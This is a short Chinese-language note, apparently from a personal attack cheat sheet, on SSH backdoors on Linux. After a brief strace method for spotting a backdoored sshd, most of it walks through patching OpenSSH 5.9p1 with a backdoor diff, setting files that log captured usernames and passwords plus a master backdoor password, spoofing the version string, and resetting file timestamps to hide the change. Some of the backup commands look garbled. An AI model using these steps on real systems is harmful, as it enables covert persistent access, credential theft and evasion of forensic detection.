LinuxSSH后门相关

找出读写的openSSH后门

ps aux | grep "sshd"
stace -o aa -ff -p 1132
SSH登录后
grep open aa* | grep -v -e No -e null -e denied | grep WR

Linux获取版本信息

cat /etc/issue
uname -ar

Linux OpenSSH后门安装

备份SSH文件

mv /etc/ssh/ssh_config /etc/ssh/ssh_config
mv /etc/ssh/sshd_config /etc/ssh/ssh_config

安装必备软件

Centos
yum install -y openssl openssl-devel pam-devel zlib zlib-devel

解压并安装补丁

tar zxf openssh-5.9p1.tar.gz
tar zxf openssh-5.9p1.patch.tar.gz//后门文件
cp openssh-5.9p1.patch/sshbd5.9p1.diff ~/opensh-5.9p1//后门包内sshbd5.9p1.diff复制过去
cd ~/opensh-5.9p1
patch < sshbd5.9p1.diff //该diff文件覆盖patch文件（后门植入）

修改includes.h配置记录用户名和密码的文件和后门密码

#define ILOG "/tmp/ilog"
#define OLOG "/tmp/olog"
#define SECRETPW "****"

修改版本

#define SSH_VERSION "****"
#define SSH_PORTABLE "****"

安装并编译

恢复日期

touch -r ***.old ***